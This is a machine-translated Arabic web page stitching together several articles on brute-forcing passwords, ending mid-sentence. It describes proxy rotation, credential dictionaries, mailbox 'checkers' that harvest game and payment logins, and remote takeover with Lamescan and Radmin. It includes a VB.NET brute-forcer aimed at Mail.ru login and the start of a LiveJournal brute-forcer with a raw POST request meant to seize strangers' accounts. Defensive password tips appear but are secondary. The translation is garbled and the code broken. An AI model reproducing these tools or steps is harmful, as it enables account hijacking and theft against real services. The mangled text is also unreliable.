القوة الغاشمة كلمات مرور القوة الغاشمة. ما هو الحساب الغاشم؟ ما هو الغاشم وكيف تحمي نفسك منه

09.12.2020

القوة الغاشمة (مشتقة من العبارة الإنجليزية: القوة الغاشمة) - متنوعة هجوم القراصنة- طريقة لاختراق الحسابات أنظمة الكمبيوتروخدمات الدفع / المصرفية وعلى مواقع الويب من خلال الاختيار الآلي لكلمات المرور ومجموعات تسجيل الدخول.

تعتمد القوة الغاشمة على الطريقة الرياضية التي تحمل الاسم نفسه (القوة الغاشمة) ، والتي فيها الحل الصحيح- تم العثور على عدد محدد أو مجموعة رمزية من خلال تعداد خيارات مختلفة. في الواقع ، يتم فحص كل قيمة من مجموعة معينة من الإجابات المحتملة (الحلول) للتأكد من صحتها.

كيف تعمل القوة الغاشمة

يكتب المخترق برنامجًا خاصًا لتخمين كلمات المرور أو يستخدم حلًا جاهزًا من زملائه. يمكن استهدافها لخدمة بريد معينة أو موقع ويب أو شبكة اجتماعية (أي مصممة لاختراق مورد معين). بعد ذلك ، يتم إجراء الاستعدادات للقرصنة. يتكون من الخطوات التالية:

  1. إعداد قائمة بالوكيل

من أجل إخفاء عنوان IP الحقيقي للكمبيوتر الذي سيتم تنفيذ الهجوم منه ، ولمنع الحجب من جانب الموقع ، حيث يكون من الضروري اختراق الحساب ، يتم تكوين اتصال الإنترنت من خلال خادم وكيل.

يتم البحث عن عناوين / منافذ الوكيل في Proxy Grabber. تستخرج هذه الأداة بشكل مستقل جميع البيانات للاتصال بالخوادم الوسيطة من المواقع التي توفر وكلاء (تم تحديدهم في القائمة). بمعنى آخر ، يتم جمع الوكيل.

يتم حفظ القاعدة الناتجة في ملف نصي منفصل. ثم يتم فحص جميع عناوين الخادم الموجودة فيه للتأكد من قابليتها للتشغيل في مدقق وكيل. في كثير من الأحيان ، تجمع البرامج المصممة للاستخراج الآلي للوكلاء بين وظائف كل من المنتزع والمدقق.

نتيجة لذلك ، يتم الحصول على قائمة بروكسي جاهزة في شكل قائمة IP / منفذ ، محفوظة في ملف txt. (ستحتاجه عند تكوين برنامج القوة الغاشمة).

  1. البحث عن قواعد بروتوس

من الضروري توصيل قاموس بالقوة الغاشمة - مجموعة معينة من مجموعات كلمات المرور وتسجيلات الدخول - والتي سيتم استبدالها في نموذج تسجيل الدخول. إنها ، مثل قائمة الوكيل ، لها شكل قائمة في ملف نص عادي (.txt). القواميس ، هي أيضًا قواعد بيانات ، يتم توزيعها من خلال منتديات القراصنة والمواقع واستضافة الملفات. يصنعها "الحرفيون" الأكثر خبرة بأنفسهم ويقدمونها للجميع مقابل رسوم. كلما كانت القاعدة أكبر (عدد المجموعات ، وتسجيلات الدخول ، والحسابات) ، كان ذلك أفضل (بالنسبة للمتسلل) - زادت احتمالية نجاح القرصنة.

  1. تكوين القوة الغاشمة

تم تحميل قائمة الوكيل ؛ سيقوم برنامج القوة الغاشمة بتغيير الوكيل تلقائيًا بحيث لا يكتشف خادم الويب الهجوم ، وبالتالي ، مصدر (مضيف) الهجوم.

تم توصيل قاموس لتركيبات كلمة المرور / تسجيل الدخول. يتم تعيين عدد الخيوط - كم عدد التركيبات التي ستفحصها القوة الغاشمة في نفس الوقت. كمبيوتر قويمع سرعة الإنترنت العالية ، فهي تتواءم بثقة مع تدفقات 120-200 (هذه هي القيمة المثلى). سرعة الغاشمة تعتمد بشكل مباشر على هذا الإعداد. على سبيل المثال ، إذا قمت بتعيين 10 سلاسل فقط ، فسيكون التحديد بطيئًا جدًا.

  1. إطلاق القوة الغاشمة

يسجل البرنامج محاولات القرصنة الناجحة: يحفظ بيانات الاعتماد (كلمة المرور / تسجيل الدخول) في ملف. تتراوح مدة إجراء الاختيار من عدة ساعات إلى عدة أيام. في الوقت نفسه ، لا يتضح دائمًا أنها فعالة - نظرًا لارتفاع مقاومة التشفير للبيانات عند الدخول أو تنفيذ تدابير الحماية الأخرى من جانب المهاجم.

أنواع القوة الغاشمة

القرصنة الشخصية

البحث عن حساب محدد - على الشبكات الاجتماعية أو على الخدمة البريدية ، إلخ. من خلال أو في العملية التواصل الافتراضيينتزع المهاجم اسم مستخدم من الضحية للوصول إلى الموقع. ثم يقوم بتكسير كلمة المرور باستخدام طريقة القوة الغاشمة: يشير إلى عنوان القوة الغاشمة لمورد الويب وتسجيل الدخول الذي تم الحصول عليه ، ويربط القاموس.

فرص مثل هذا الاختراق صغيرة ، على سبيل المثال ، مقارنة بنفس هجوم XSS. يمكن أن يكون ناجحًا إذا استخدم صاحب الحساب كلمة مرور مكونة من 6 إلى 7 أحرف مع تركيبة رمزية بسيطة. خلاف ذلك ، سوف يستغرق الأمر سنوات - عشرات ومئات السنين "لتخمين" المتغيرات الأكثر استقرارًا من 12 ، 15 ، 20 حرفًا ، رقمًا ورموزًا خاصة ، بناءً على حسابات معادلة البحث الرياضية.

بروت / تحقق

يتم توصيل قاعدة البيانات التي تحتوي على معلومات تسجيل الدخول / كلمات المرور من علب بريد نفس خدمة البريد (على سبيل المثال ، mail.ru) أو غيرها بالقوة الغاشمة. وقائمة الوكيل - لإخفاء المضيف (منذ طلبات متعددة من عنوان IP واحد ، خدمات الويب بريد الالكترونياكتشاف الهجوم بسرعة إلى حد ما).

تحتوي خيارات brutus على قائمة بالكلمات الرئيسية (كقاعدة عامة ، أسماء المواقع) - المعالم التي سيبحث من خلالها عن معلومات تسجيل الدخول على علب البريد المخترقة بالأحرف (على سبيل المثال: steampowered ، worldoftanks ، 4game ، VK). أو مورد إنترنت محدد.

عند التسجيل في لعبة عبر الإنترنت أو شبكة اجتماعية أو منتدى ، يشير المستخدم ، كما هو متوقع ، إلى بريده الإلكتروني ( صندوق بريد). ترسل خدمة الويب رسالة إلى العنوان المحدد مع معلومات تسجيل الدخول ورابط لتأكيد التسجيل. هذه الحروف هي التي تبحث عنها القوة الغاشمة لاستخراج معلومات تسجيل الدخول وكلمات المرور منها.

اضغط على زر "START" وسيبدأ جهاز التكسير بالقوة الغاشمة. تعمل وفقًا للخوارزمية التالية:

  1. تحميل تسجيل الدخول / كلمة المرور إلى البريد من قاعدة البيانات.
  2. التحقق من الوصول ، أو "التحقق" (تسجيل الدخول تلقائيًا): إذا تمكنت من تسجيل الدخول إلى حسابك ، فأضف واحدًا في العمود الجيد (الجيد) (يعني أنه تم العثور على بريد إلكتروني آخر يعمل) وابدأ في عرضه (انظر النقاط التالية)؛ إذا لم يكن هناك وصول ، فإنه يضعه في وضع سيء (سيء).
  3. في جميع "الطنانات" (رسائل البريد المفتوحة) ، تقوم القوة الغاشمة بمسح الرسائل بناءً على الطلب المقدم من المتسلل - أي أنها تبحث عن عمليات تسجيل الدخول / كلمات المرور للمواقع وأنظمة الدفع المحددة.
  4. عند العثور على البيانات المطلوبة ، يقوم بنسخها وتخزينها في ملف منفصل.

وبالتالي ، هناك "اختطاف" ضخم للحسابات - من عشرات إلى مئات. يتصرف المهاجم في الجوائز التي حصل عليها وفقًا لتقديره الخاص - البيع والتبادل وجمع البيانات وسرقة الأموال.

قرصنة الكمبيوتر عن بعد

يتم استخدام القوة الغاشمة جنبًا إلى جنب مع أدوات القرصنة الأخرى للحصول على الوصول عن بعدإلى جهاز الكمبيوتر الخاص بالضحية المحمي بكلمة مرور عبر قناة على الإنترنت.

يتكون هذا النوع من الهجوم من المراحل التالية:

  1. إنه يبحث عن شبكات IP التي سيتم فيها هجوم على أجهزة الكمبيوتر الخاصة بالمستخدمين. نطاقات العناوين مأخوذة من قواعد البيانات الخاصة أو عن طريق برامج خاصةمثل IP Geo. في ذلك ، يمكنك تحديد شبكات IP لمقاطعة ومنطقة وحتى مدينة معينة.
  2. يتم تعيين نطاقات IP وقواميس التحديد في إعدادات القوة الغاشمة Lamescan (أو نظيرتها) ، والمخصصة لتسجيل الدخول عن بُعد / تسجيل كلمة المرور عن بُعد. بمجرد إطلاقه ، يقوم Lamescan بما يلي:
  • ينفذ اتصالاً بكل IP من النطاق المحدد ؛
  • بعد إنشاء اتصال ، يحاول الاتصال بالمضيف (الكمبيوتر) عبر المنفذ 4899 (ولكن قد تكون هناك خيارات أخرى) ؛
  • إذا كان المنفذ مفتوحًا: يحاول الوصول إلى النظام ، استخدم القوة الغاشمة عند المطالبة بكلمة مرور ؛ في حالة نجاح ذلك ، يحفظ عنوان IP الخاص بالمضيف (الكمبيوتر) ومعلومات تسجيل الدخول في قاعدة البيانات الخاصة به.

  1. أطلق المخترق أداة Radmin المساعدة المصممة للتحكم في أجهزة الكمبيوتر عن بُعد. يضبط إحداثيات شبكة الضحية (IP واسم المستخدم وكلمة المرور) ويستقبلها سيطرة كاملةفوق النظام - سطح المكتب (المعروض بشكل مرئي على شاشة كمبيوتر الدخيل) ، أدلة الملفات ، الإعدادات.

برامج بروتوس

القوة الغاشمة الكلاسيكية ، واحدة من الأوائل. ومع ذلك ، فإنه لا يفقد أهميته ويتنافس مع الحلول الجديدة. لديه خوارزمية ذكية للقوة الغاشمة ويدعم جميع بروتوكولات الإنترنت الرئيسية - TCP / IP ، و POP3 ، و HTTP ، وما إلى ذلك ، وهو يعرف كيفية تزييف ملفات تعريف الارتباط. يعامل القاموس بوحشية ويولد كلمات مرور من تلقاء نفسه.

مدقق غاشم قوي. مجهزة بترسانة موسعة من الوظائف للعمل مع قواعد البيانات (التدقيق والفرز حسب المجالات). يدعم أنواع مختلفة من الوكلاء ، ويتحقق من أدائهم. يفحص الرسائل في صناديق البريد باستخدام إعدادات مثل التاريخ والكلمة الرئيسية والعنوان رسائل غير مقروءة... يمكنه تنزيل رسائل من Mail.ru و Yandex.

Appnimi كلمة المرور أونلوكر

برنامج للهجوم باستخدام القوة الغاشمة لكلمة مرور لملف الكمبيوتر المحلي... نوع من العمود الفقري. يسمح لك الإصدار المجاني من البرنامج بتخمين كلمات مرور لا تزيد عن 5 أحرف. يمكنك قراءة كيفية تثبيت واستخدام Appnimi Password Unlocker

في الألعاب والشبكات الاجتماعية وما إلى ذلك التي تم الحصول عليها بشكل غير قانوني ، أي تم اختراقها أو سرقتها. بالطبع ، من الصعب فهم ما هو وحشي ، وكيف يعمل ، لكننا سنحاول القيام بذلك. لكن أولاً ، دعنا نتعرف على كيفية تجنب الوقوع ضحية أخرى لمجرمي الإنترنت.

ما هو الغاشم وكيف تحمي نفسك منه

لذلك ، هناك برنامج خاص يسمح لك بالعثور على كلمات المرور الصحيحة لعمليات تسجيل الدخول الحالية ، والبريد الإلكتروني ، وما إلى ذلك عن طريق اختيار مجموعات من الأرقام والحروف. وبالطبع ، فإن مثل هذه البرامج لها عدد من الخصائص المميزة. على سبيل المثال ، كلما كانت كلمة المرور أطول وأكثر تعقيدًا ، كلما استغرق الأمر وقتًا أطول لفرضها ، يمكن أن يصل كل شيء إلى النقطة التي يفشل فيها الغاشم. بالنسبة للوقت ، يعتمد الكثير على قوة الحوسبة للتكنولوجيا ، والاتصال بالإنترنت. لذلك ، يمكن أن تستغرق العملية عدة دقائق وتستمر حتى يوم أو أكثر.

ربما تكون قد فهمت بالفعل ماهية الحساب الغاشم. أما بالنسبة للحماية ، إذًا ، كما هو مذكور أعلاه ، فمن المستحسن تعيين كلمة مرور يصعب تذكرها بنفسك. على سبيل المثال ، RKGJH4hKn2. من الآمن أن نقول إن القرصنة ستكون مشكلة كبيرة. بالإضافة إلى ذلك ، عليك أن تتذكر أنه ، على سبيل المثال ، العديد من الأحرف المتطابقة لا تعطي أي تأثير ، تمامًا مثل الأرقام. يجب الخلط بين كل شيء ومختلط ، ويفضل التبديل بين الأحرف الكبيرة والصغيرة.

ما هو أساس بروتوس

بالطبع لن يعمل البرنامج في حالة عدم وجود بيانات. لذا ، إذا لم يكن لديها ما يفرض استخدام كلمات المرور بوحشية ، فلن تفعل ذلك. القاعدة عبارة عن مجموعة من كلمات المرور وتسجيلات الدخول. كلما كانت القائمة أكثر شمولاً ، زادت فرص اختراق حسابك. يعتمد الكثير أيضًا على التركيبات الموجودة فيه ، أي أنه كلما زاد عدد الأشخاص المتعلمين ، كان ذلك أفضل. وتجدر الإشارة أيضًا إلى أن قاعدة البيانات لا تتضمن كلمات المرور فحسب ، بل تتضمن أيضًا عمليات تسجيل الدخول ، نظرًا لأن القوة الغاشمة ، والتي تعني "القوة الغاشمة" باللغة الإنجليزية ، يمكنها اختيار كليهما في نفس الوقت.

من الجدير بالذكر أن الملف نفسه ، الذي يحتوي على جميع السجلات ، كبير جدًا. الحد الأدنى لطول المجموعة هو 3 أحرف وأرقام ، والحد الأقصى هو 8-16 حسب البرنامج وإصداره. يبدأ التحديد بالحرف "A" وينتهي بالحرف الأخير من الأبجدية الإنجليزية أو الروسية. هذا هو أساسًا جميع المعلومات الموجودة في قواعد البيانات التي قد تكون مفيدة لك.

من يحتاجها ولماذا؟

من الصعب الإجابة على هذا السؤال بشكل لا لبس فيه. يحاول الناس اختراق الحسابات لأسباب عديدة. يمكن أن يكون الأمر ممتعًا ، أو الرغبة في قراءة رسائل شخص آخر ، أو إرسال رسائل غير صالحة ، وما إلى ذلك. الشيء هو أنه غير قانوني. بالإضافة إلى ذلك ، يمكن اعتبارها أكثر السرقات الحقيقية ، وتحتاج إلى الرد على هذا. لا نشجع بشدة على القيام بمثل هذه الأشياء ، خاصة أنه في بعض الأحيان يكون مضيعة للوقت.

حتى إذا تم اختراق الحساب ، يمكن استعادته بسهولة وسرعة. من السهل القيام بذلك بشكل خاص إذا قدمت بيانات حقيقية عند التسجيل. بالنسبة للحسابات التي تم إنشاؤها على بعجلة، فسيكون استعادتهم أكثر صعوبة. ولكن ، كما تبين الممارسة ، لا يقدر المتسللون مثل هذه الحسابات. ليس من المنطقي أن تأخذ من شخص ما حسابًا أو بريدًا لا يحتوي على أي شيء مفيد ، ولا داعي للتحدث عنه مرة أخرى.

من يفعل القوة الغاشمة؟

لن يكون من غير الضروري أن نقول إن من يسمون بالمخترقين يفعلون ذلك. هذا عن الاختراقات على نطاق واسع. بشكل عام ، يكسب هؤلاء الأشخاص قوتهم على هذا ويفعلونه بمهارة كبيرة. والمخطط يعمل على النحو التالي. بمساعدة brutus ، يتم تحديد تسجيلات الدخول وكلمات المرور (مبلغ معين) ، ثم يتم بيع كل شيء بكميات كبيرة للعملاء. أي أن المتسللين أنفسهم عمليًا لا يستخدمون ما تلقوه بشكل غير قانوني ، لكنهم يبيعونه ببساطة. لكن من هو المشتري تسأل؟

يمكن أن يكون أي شخص. الشيء الوحيد الذي يمكن قوله هو أنهم يشترون الكثير من الحسابات. علاوة على ذلك ، يتم بيع هذه الحسابات مستخدمين عاديينالذي تفاجأ بعد ذلك بأنه عاد إلى صاحبه السابق. الأمر نفسه ينطبق على البيانات الشخصية لأنظمة الدفع (Webmoney ، Qiwi). بالإضافة إلى إمكانية الحصول على مبلغ معين من الأموال ، يمكن بيع هذا الحساب ، خاصة في الحالات التي توجد فيها شهادات باهظة الثمن تؤكد أهلية المالك.

قليلا عن الخوادم الوكيلة للقوة الغاشمة

يفكر أي متسلل يحترم نفسه أولاً وقبل كل شيء في كيفية حماية نفسه. وبما أن ما يفعله غير قانوني تمامًا ، فينبغي إيلاء اهتمام خاص لذلك. نحن نعرف بالفعل ما هو الغاشم ، ولكن الآن أود أن أقول كيف يعمل الخادم الوكيل. سيسمح لك بالمرور دون أن يلاحظك أحد أثناء اختراق الحساب. بكلمات بسيطة، يظل عنوان IP غير معروف. هذه هي الحماية الرئيسية للأشخاص الذين يخترقون حسابات الآخرين.

لكن هذا ليس كل شيء. بعد اختراق الحساب ، يجب عليك الانتقال إليه. ولكن حتى بعد تسجيل الدخول الصحيحوكلمة المرور ، في بعض الأحيان ليس من السهل القيام بذلك. على سبيل المثال ، يستلزم تغيير عنوان IP إرسال رمز أمان إلى البريد أو الهاتف ، ويتم استخدام هذا النظام بنجاح بواسطة Valve ، على وجه الخصوص ، لحماية منتجهم المسمى Steam. بالطبع ، لقد أصبح الأمر واضحًا بالفعل بالنسبة للبروتوس. لذلك ، يمكننا تسجيل الدخول إلى أي حساب وعدم إثارة أي شك على الإطلاق ، مما يجعل الجريمة مثالية.

لا داعي للتكرار مرة أخرى أن كلمة المرور يجب أن تكون طويلة ومعقدة. لا يوصى أيضًا باستخدام حسابك في الأماكن العامة أو في العمل ، حيث يمكن لأي شخص استخدام جهاز كمبيوتر أو كمبيوتر محمول. أولاً ، يمكن استخدام برنامج تجسس خاص يتذكر المفاتيح التي تم الضغط عليها ، كما تفهم ، لن يكون من الصعب حساب كلمة المرور.

لكن هذا ليس كل ما تحتاج إلى معرفته. يُنصح بعدم تذكر كلمة المرور في المتصفح ، حيث يمكن اعتراضها. هناك حسابات تأتي فيها رسالة SMS فور الدخول مع رمز تأكيد إلى هاتف محمول... لذلك ، إذا جاء ، ولا علاقة لك به ، فقم بتغيير كلمة المرور ، وينصح بالتصرف بأسرع ما يمكن.

ما هو الفرق بين الغاشمة والمدقق؟

لذا ، دعنا الآن نكتشف الفرق بين هذين المفهومين. لذلك ، قررنا بالفعل أن القوة الغاشمة تسمح لك بالعثور على اسم مستخدم وكلمة مرور من خلال بحث بسيط من القاموس (القاعدة). ضع في اعتبارك مثالاً لخدمة البريد المخترقة. على سبيل المثال ، حصلنا على حق الوصول ، ولكن ماذا يجب أن نفعل بعد ذلك؟ كقاعدة عامة ، فهم مهتمون بمعلومات حول الحسابات في الشبكات الاجتماعية ، ألعاب على الانترنت, أنظمة الدفعوهكذا ، فإن المدقق يتحقق من كلمة المرور من البريد ، والتي لدينا بالفعل ، من أجل التطابقات.

بكلمات بسيطة ، إذا تطابق ، على سبيل المثال ، الذي تم تثبيته بواسطة فكونتاكتي ، فسنكتشف ذلك على الفور. يمكننا أن نستنتج أن هذا سيحرمنا من الصداع غير الضروري. وبالتالي ، فإن العملية أكثر آلية ولا تتطلب عمليًا مشاركتنا. الآن أنت تعرف ما هي brute و checker وكيف تعمل هذه البرامج.

استنتاج

بناءً على ما سبق ، يمكن استخلاص بعض الاستنتاجات. حسابيجب استخدامه فقط على كمبيوتر شخصيعندما يتم استبعاد وصول الأشخاص غير المصرح لهم. الأمر نفسه ينطبق على الاتصالات بشبكة Wi-Fi المجانية ، نظرًا لوجود احتمال لاعتراض تدفق البيانات وسرقة حسابك لاحقًا. بما أنك تعرف بالفعل أيها الغاشم ، سيكون من الأسهل عليك الدفاع عن نفسك. كما يقول المثل ، من يعلم فهو مسلح. تذكر أن مدى جودة حماية حسابك أمر متروك لك تمامًا. إذا فعلت كل شيء بشكل صحيح ، فلا داعي للقلق مرة أخرى ، ولن تحتاج إلى معرفة ماهية الحساب الغاشم والفروق الدقيقة في البرنامج.

مرحبا بالجميع! أخيرًا وجدت الوقت المناسب لكتابة مقال رائع.

في ذلك ، سأوضح لك كيفية كتابة BruteForce.

1) قليلا من التاريخ

في بداية العام ، بدأت في البحث عن معلومات حول كتابة القوة الغاشمة على الشبكة.

كان هناك القليل جدًا منه ، حتى أنني اضطررت إلى ترجمة شيء ما من الإسبانية =)).

لكنني لم أستسلم وواصلت البحث ، وقبل شهرين اكتشفت كل شيء وكتبت قوة غاشمة بسيطة ذات خيط واحد. ولكن قبل "العمالقة" مثل "Brutus AET2" كان بعيدًا. بدأت في البحث عن معلومات حول تعدد مؤشرات الترابط ، وتوجت عمليات البحث التي أجريتها بالنجاح. الآن تم جمع كل المعلومات وأنا أكتب هذا المقال حتى لا يضطر أولئك الذين قرروا كتابة شخص غاشم لتسلق زوايا الشبكة وجمع المعلومات.

2) النظرية

في قصتي السابقة ، أشرت مرارًا وتكرارًا إلى كلمة القوة الغاشمة. ما هذا؟

دعني أوضح لك مثالاً: لنفترض أنك نسيت كلمة مرورك ، وليس البريد الإلكتروني (بالمناسبة ، يحدث هذا كثيرًا).

يمكنك محاولة استعادة كلمة المرور من خلال سؤال الأمان أو الهاتف المحمول ، ولكن إذا لم يكن هناك هاتف محمول ، وسؤال الأمان يقول - "كم عدد أسنان قطتي على المخلب الأيمن؟"

ماذا تفعل بعد ذلك؟ هذا صحيح ، حاول تخمين كلمة المرور. ولكن كيف؟؟؟ يدويا ؟؟ بالطبع لا ، هذا هو السبب وراء إنشاء القوة الغاشمة للقيام بهذه القوة الغاشمة نيابة عنك.

مبدأ التشغيل بسيط: نشير إلى بريدنا الإلكتروني ونربط قائمة كلمات المرور. انقر فوق ابدأ وابدأ في عملك. عندما يتم العثور على كلمة المرور الصحيحة ، ستعرضها القوة الغاشمة على الشاشة.

كل شيء سيكون على ما يرام ، ولكن إذا كان لدينا مليون كلمة مرور في قاموسنا؟ سيرسل Brutus مليون طلب إلى الخادم وسيعتقد الخادم أننا نحاول اختراق صندوق بريد شخص آخر وسنقوم ببساطة بحظر عنوان IP الخاص بنا. فكيف تكون إذن؟

لهذا قمنا بتوفير خوادم بروكسي. لن أخبرك ما هو ، لأنه موضوع واسع إلى حد ما. يمكنك أن تقرأ عن الوكلاء. باختصار: الخوادم الوكيلة ستغير عنوان IP الخاص بنا وسيستمر البحث.

النقطة الأخيرة في النظرية هي أوضاع التعداد.

لا يوجد سوى اثنين منهم: خيوط واحدة ومتعددة الخيوط.

في الوضع المفرد ، تأخذ القوة الغاشمة كلمة المرور الأولى وتنتظر استجابة من الخادم. عند استلام الإجابة ، تأخذ كلمة المرور التالية ، إلخ.

في الوضع متعدد الخيوط ، تخلق القوة الغاشمة العديد من الخيوط. كل واحد منهم هو القوة الغاشمة ، أي أن القوة الغاشمة لا تحتاج إلى انتظار استجابة من الخادم للاستمرار. يقوم فقط بإنشاء الخيط التالي ويستمر التكرار.

مثال: قررت تنزيل فيلم عبر التورنت. لقد وجدت ملف التورنت وقمت بالتنزيل. أثناء تقدم التنزيل ، على سبيل المثال ، انتقلت إلى جهة الاتصال وتواصل مع أصدقائك. في أحد الدفقين ، يعمل المتصفح ، وفي الآخر ، يقوم التورنت بتنزيل الفيلم بجد ، وفي الثالث ، يقوم برنامج مكافحة الفيروسات بفحص النظام ، وما إلى ذلك.

آمل أن أكون قد شرحتها بوضوح.

2) ممارسة طال انتظارها

بينما سنكتب غاشمة بسيطة أحادية الخيط (حتى لا تفرط في تحميل الأدمغة) ، وفي الجزء الثاني من هذه المقالة ، سأتحدث عن إنشاء قوة غاشمة متعددة الخيوط وتغييرها

الوكيل + سأقدم أجزائي من الكود التي يمكنك استخدامها في مشاريعك.

وبالتالي! يذهب.

نفتح VB.NET وننشئ مشروعًا عاديًا ونفعل شيئًا كالتالي:

أنت الآن بحاجة إلى اتخاذ قرار بشأن الخادم و "شم" الطلبات.

سأعرض استخدام Mail.ru كمثال:

بمساعدة ذلك ، سنرى كيف يحدث التفويض على الخادم.

2) تشغيل إصدار مستقل من البرنامج: 3

3) نذهب إلى بريد Mail.ru وأدخل البيانات ، لكن لا تدخل بعد:

4) في HttpAnalyzer ، انقر فوق الإيقاف المؤقت.

نعود إلى Mail Mail ونضغط على Enter.

عاد الآن إلى الشم. نلاحظ ما يلي:

يتم تمييز طلب POST لنص التفويض باللون الأزرق.

دعونا نرى ما هي البيانات التي يتم إرسالها:

دخول

المجال - المجال

كلمة المرور - كلمة المرور

Saveauth - هل يجب علينا حفظ بياناتنا (لست متأكدًا تمامًا)

لا يمكنني قول أي شيء عن المعلمة الأخيرة ، لكننا لسنا بحاجة إليها: n =)

أحاول إرسال طلب:

إذا تم إدخال كل شيء بشكل صحيح ، فإننا نصل إلى بريدنا.

إذا لم يكن كذلك ، فسنرى رسالة خطأ تسجيل الدخول.

للقيام بذلك ، انتقل إلى علامة التبويب ملفات تعريف الارتباط. نحن مهتمون بالجانب الأيمن:

نرى أنه يتم إنشاء اثنين من ملفات تعريف الارتباط: Mpop و t.

"تعيين - ملف تعريف الارتباط" - حقل العنوان المرسل إلى الخادم.

6) الآن دعنا ندخل البيانات اليسرى ونحلل النتيجة.

نحن نرى أن ملفات تعريف الارتباط لا يتم إنشاؤها.

بخير! الآن نعرف كيف نكتب القوة الغاشمة:

أولاً ، دعنا نعلن عن مصفوفة نضع فيها كلمات المرور من القاموس:

قائمة المرور العامة كقائمة صفيف جديدة

رمز الزر "..." (ثلاث نقاط):

خافت f كـ OpenFileDialog جديد "إنشاء مربع حوار فتح ملف جديد إذا كان f.ShowDialog = Windows.Forms.DialogResult.OK And f.FileName<>"" ثم "إذا حدد المستخدم القائمة ، فحينئذٍ قم بإخراج المسار إلى الملف End If

الآن رمز زر بدء التكرار:

إذا كان txtLogin.Text<>"" ثم "إذا قمت بإدخال تسجيل دخول ، فعندئذٍ Dim i As Integer = 0" أعلن عن عداد للتكرار من أجل i = 0 To PassList.Count - 1 "نقوم بالتكرار أثناء وجود كلمات مرور System.Threading.Thread.Sleep ( 1000) طلب خافت كشبكة HttpWebRequest = Net.HttpWebRequest.Create ("http://win.mail.ru/cgi-bin/auth؟Login=" & txtLogin.Text & "& Domain =" & Split (txtLogin. Text، "@") (1) _ & "& Password =" & PassList (i)) "تشكيل طلب Dim Response As Net.HttpWebResponse" طريقة نقل البيانات: Request.Method = "POST" "تعطيل طلب الانتقال .AllowAutoRedirect = خطأ "إرسال طلب Response = Request.GetResponse" التحقق من ملفات تعريف الارتباط If Response.Headers ("Set-Cookie"). IndexOf ("Mpop") = 0 ثم "إذا كان هناك ملف تعريف ارتباط Mpop ، ثم MsgBox (" كلمة المرور المتطابقة: "+ PassList (i))" عرض كلمة المرور Exit Sub "ننهي البحث End If Next End إذا

إذا كان هناك شيء غير واضح - اكتب لي. سأترك جهات الاتصال الخاصة بي أدناه.

نصنع قاموس كلمات المرور مثل:

[هذه هي كلمة المرور الصحيحة]

234411dsdfd

انسخ وغيّر النص الأحمر إلى كلمة مرورك.

نربط كل شيء بالبرنامج:

نضغط لبدء البحث.

إذا رأيت مربع تم العثور على كلمة المرور ، فهذا يعني أن كل شيء يعمل.

ملاحظة آسف للأخطاء المطبعية.

P.P.S إذا كان هناك شيء غير واضح ، فاكتب. يسعدني دائمًا تقديم المساعدة!


تعليقات ()

كولهاكر

سأعطيك الرمز !!! يا له من شعب لعنة ؟!

XeoN

وكيف نميزها ؟؟

كولهاكر

لذلك ، انتقل إلى VB.NET. اللعنة ، الجميع يكتبون عن القرصنة ، لذا إذا كتبوا للتو ، فإنهم يسعون جاهدين أيضًا لتسليط الضوء على الكود!

طلب ضخم للأجيال القادمة: لا تعطِ الكود !!!

أرتيوم

حسنا أنت kapets mega power

مصدر

إذا قمت فقط بنشر المصدر

ديكوساركوليا

درس مفيد جدا :) لقد نجحت فيه البصرية الأساسية 2008 ، على الرغم من أنني قمت بتحريره قليلاً

الجميع يعرف كيف يتم ذلك في الآونة الأخيرةأصبح
الموارد الشعبية livejournal.com أو ببساطة LJ.
إنشاء حساب في هذا النظام بعيد كل البعد عن
ببساطة. تحتاج إما إلى دفع ثمن المفتاح ، أو
اسأل أصدقاءه ZhZhistov.

هناك مثل مشهور: ماذا
للتسول وإذلال نفسك ، فمن الأفضل<вырезано
رقابة> والتزم الصمت :). لذلك ، نحن اليوم
سنكتب القوة الغاشمة التي بسهولة
سوف يكسر يديه LJ من بعض الأمريكيين
labukha :). بالطبع عليك أن تختار
الضحية الذي ألقى بضع رسائل بعد ذلك
التسجيل ، ثم غرق في الماء ، ثم
تم تسجيله ببساطة في المجلة الحية. مثل
الحسابات كاملة ويمكنك العثور عليها بدون
مشاكل.

لذا ، عد إلى فكرتنا. اولا نحن
تحتاج إلى معرفة كيفية تسجيل الدخول إلى
النظام. بالذهاب إلى www.livejournal.com/login.bml سنرى
في الزاوية اليمنى العليا يوجد نموذج صغير لـ
تسجيل الدخول. لا ، أنا لا أحكم على الشخص الكبير في المنتصف
شاشة. بعد النظر في كود html ، اخترت
صغير. الحقيقة هي أنه في هذا الشكل من كل شيء
معاملين ، على عكس المعامل الكامل. لنا
القوة الغاشمة المستقبلية يجب أن تنقل على الأقل
البيانات لكفاءة عالية ، لذلك
دعنا نتناول هذا النموذج.

يحتوي النموذج على معلمتين: المستخدم وكلمة المرور. نفسي
يمكن الحصول على البرنامج النصي اختياري
معلمة وضع قيمتها "تسجيل الدخول".
على ما يبدو ، عند تمرير المستخدم وكلمة المرور ، فإن النظام
يعني الإذن. بفارغ الصبر
القيادة في الرابط في المتصفح http://www.livejournal.com/login.bml؟user=fuck&password=fucked
(بالطبع ، تم تغيير جميع الأسماء من أجل
مؤامرة :)) ، حصلت على استدارة من البوابة.
تم تصميم النظام فقط من أجل طريقة POST.
لكنني شخص عنيد ولا أستطيع حتى المقاومة
هذه الحماية:].

كانت الخطوة التالية هي استعادة الذاكرة
من أجل طريقة POST للعمل. له
نقل ما يلي إلزامي
المعلمات إلى الخادم:

بريد
مضيف
طول المحتوى

نشر نفسه 🙂

بعد رسم طلب تقريبي ل
الخادم ، حصلت على هذا:

نشر /login.bml HTTP / 1.1
المضيف: www.livejournal.com
نوع المحتوى: application / x-www-form-urlencoded
طول المحتوى: 26

المستخدم = اللعنة & كلمة المرور = مارس الجنس

الغريب أنه لم ينجح :). نظام
أقسم على كلمة مرور خاطئة. اعتقدت ، يقولون
هناك فحص لـ Referer و UserAgent ، لكن خطأ.
عند استبدال المعلمات الوهمية
قام الخادم أيضًا بإرجاع كلمة المرور غير صحيحة. كيف
اتضح إذا وضعت بعد كلمة المرور
& الحرف وزيادة طول السلسلة بمقدار
واحد ، ثم الخادم يأكل البيانات بنجاح و
عاد تسجيل الدخول.

أنا حقًا لم أرغب في ضخ كل شيء
طويل HTMLin وقطع سطر منه
تم تسجيل الدخول. أردت أن أقصر نفسي على تلقي متواضع
كيلوبايت واحد من البيانات :). كان من الممكن
منذ أن وضع الخادم ملفات تعريف الارتباط في سطور العنوان.
تم احتواء ملفات تعريف الارتباط هذه بإجابة ناجحة
اسم المستخدم وكلمة المرور المشفرة ،
بتنسيق مثل هذا:

